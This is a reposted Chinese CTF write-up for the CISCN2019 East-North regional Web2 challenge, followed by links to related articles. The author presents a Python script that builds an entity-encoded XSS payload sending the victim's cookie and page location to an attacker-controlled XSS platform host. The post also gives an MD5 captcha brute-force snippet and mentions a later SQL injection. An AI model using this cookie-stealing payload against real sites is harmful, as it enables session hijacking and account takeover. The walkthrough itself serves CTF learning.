[CISCN2019 华东北赛区]Web2

2024-03-27 06:44
文章标签 东北 web2 ciscn2019 赛区

本文主要是介绍[CISCN2019 华东北赛区]Web2,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

[CISCN2019 华东北赛区]Web2

  • 随便注册一个登录,发现
    image.png
  • 还有反馈页面,一看就知道大概率是xss,应该是为了得到管理员cookie
  • 扫描了一下,果然有admin.php后台登录
    image.png
  • buu可以连接访问外网了,所以内部的xss平台关闭了,使用自己搭建的莲花平台,不过需要一个服务器

自己搭建的xss平台使用

搭建

参考
https://blog.csdn.net/weixin_44652484/article/details/134169568
搭建非常简单

使用

image.png
根据其他人的题解
payload

xss='''(function(){window.location.href='http://ip/xss_platform/?location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();'''  
output = ""  
for c in xss:  
output += "&#" + str(ord(c))  print("<svg><script>eval&#40&#34" + output + "&#34&#41</script>")
  • 然后提交文章,得到连接,来到反馈页面
    image.png
  • 说了要将域名改成web
    验证码
import hashlib
num=input()
for i in range(999999,10000000):m=hashlib.md5()m.update(str(i).encode())m=m.hexdigest()if m[:6]==num:print(i)break
  • 然后我得不到管理员的cookie啊,算了,反正思路是这样的,有没有大佬知道为什么的
  • 得到phpsessid之后登录,然后就是一个简单的sql注入

这篇关于[CISCN2019 华东北赛区]Web2的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!


http://www.chinasem.cn/article/851234

相关文章

2014年ACM/ICPC亚洲区现场赛广州赛区总结

2014年ACM/ICPC亚洲区现场赛广州赛区总结

本来不想提这件事的,后来学姐找我谈心时提到这件事,我突然意识到在这件事情上我错了一次,明明答应的去参加这场比赛,最后临时决定不去......其实中间有很多很多原因 1:我和tyh,sxk临时不去主要是广州太远,我们身上money不够,呵呵。。。别笑我们,你以为我们是高富帅啊,去一趟广州消费要2个月的生活费,奖学金又没发,你让我找我妈要她辛辛苦苦挣来的工资吗?!从哈尔滨到广州单来回的火车票每个人就
阅读更多...
[CISCN2019 华东南赛区]Web111

[CISCN2019 华东南赛区]Web111

考点: xff ssti 打开看到页面存在IP和XFF,右上角是咱们自己的IP 看到现在,可以想到尝试一下xff,当我们bp抓包后,添加xff,我们可以发现右上角的Current IP发生了变化,并且当我们输入什么他就会变成什么,这时候就应该想到ssti注入了 进行注入发现是Smarty 模板注入(好像页面下面也有提示"Bulid with Smarty",……不过没关系),可以
阅读更多...
破局医疗数据安全:天空卫士“登录”东北医院信息网络大会

破局医疗数据安全:天空卫士“登录”东北医院信息网络大会

2024年8月24日至25日,以“科技赋能,重塑未来医疗”为主题的2024东北医院信息网络大会在长春隆重举行。作为数据安全领域的领军企业,天空卫士应邀参会,为与会者带来专门针对医疗行业的先进数据安全解决方案。医疗行业数据风险分析随着信息技术的快速发展和国家政策的大力支持,我国医疗行业正在经历一场深刻的数字化转型。2020年爆发的新冠疫情进一步加速了数字医疗的推进。如各类医疗信息数据已成为各大医疗机
阅读更多...
27人获批国家杰青、优青!设立东北专项

27人获批国家杰青、优青!设立东北专项

据辽宁日报报道,2024年国家自然科学基金委在国家杰青和国家优青中设立了东北专项,此次获得东北专项支持的共有6人。 此次辽宁省共27人获2024年度国家杰出青年、优秀青年科学基金项目资助,其中国家杰青9人、国家优青18人。 批准资助直接经费7600万元,再创历史新高。获资助国家杰青9人中,大连理工大学4人、中国科学院大连化学物理研究所2人、中国科学院金属研究所2人、东北大学1人。 为进一步构
阅读更多...
【构造共轭函数+矩阵快速幂】HDU 4565 So Easy! (2013 长沙赛区邀请赛)

【构造共轭函数+矩阵快速幂】HDU 4565 So Easy! (2013 长沙赛区邀请赛)

【题目链接】 :click here~~ 【题目大意】:  A sequence Sn is defined as: Where a, b, n, m are positive integers.┌x┐is the ceil of x. For example, ┌3.14┐=4. You are to calculate Sn.   You, a top coder, say
阅读更多...
6月21日训练 (东北林业大学)(个人题解)

6月21日训练 (东北林业大学)(个人题解)

前言:   这次训练是大一大二一起参加的训练,总体来说难度是有的,我和队友在比赛时间内就写出了四道题,之后陆陆续续又补了了三道题,还有一道题看了学长题解后感觉有点超出我的能力范围了,就留给以后的自己吧。话不多说,上正文。 正文:   Problem:A 幸运数字: #include <bits/stdc++.h>using namespace std;int sum,ans;in
阅读更多...
【web2】jquary,bootstrap,vue

【web2】jquary,bootstrap,vue

文章目录 1.jquary:选择器1.1 jquery框架引入:$("mydiv") 当成id选择器1.2 jquery版本/对象:$(js对象) -> jquery对象1.3 jquery的页面加载事件:$ 想象成 window.onload =1.4 jquery的基本选择器:$()里内容1.5 层级/属性选择器:先$("#btn1").click(function () {}1.6 j
阅读更多...
Windows应急响应靶机 - Web2

Windows应急响应靶机 - Web2

一、靶机介绍 应急响应靶机训练-Web2 前景需要:小李在某单位驻场值守,深夜12点,甲方已经回家了,小李刚偷偷摸鱼后,发现安全设备有告警,于是立刻停掉了机器开始排查。 这是他的服务器系统,请你找出以下内容,并作为通关条件: 1.攻击者的IP地址(两个)? 2.攻击者的webshell文件名? 3.攻击者的webshell密码? 4.攻击者的伪QQ号? 5.攻击者的伪服务器IP地址
阅读更多...
2024全国大学生信息安全竞赛(ciscn)半决赛(西南赛区)Pwn题解

2024全国大学生信息安全竞赛(ciscn)半决赛(西南赛区)Pwn题解

前言 前两天把华南赛区和东北赛区的Ciscn半决赛题目复现完了。 最近西南赛区半决赛也刚刚结束,找师傅要了Pwn题目,复现一下。 Pwn1-vuln 比较有意思的题目,构造很巧妙,call的函数地址指向栈顶变量地址。 使得我们可以构造16字节的read的shellcode实现任意大小shellcode读取。 逆向分析 签到题,程序逆向很简单,挺有意思的一个题目。拖入IDA分析:
阅读更多...
hdu 2014西安赛区网络赛 5011Game

hdu 2014西安赛区网络赛 5011Game

一做网络赛就感到压力十足  挤进前90  压力山大啊。。。  Game Time Limit: 2000/1000 MS (Java/Others)    Memory Limit: 65536/65536 K (Java/Others) Total Submission(s): 72    Accepted Submission(s): 56 Problem Descripti
阅读更多...

Copyright China编程 23002807@qq.com

沪ICP备2023033072号-2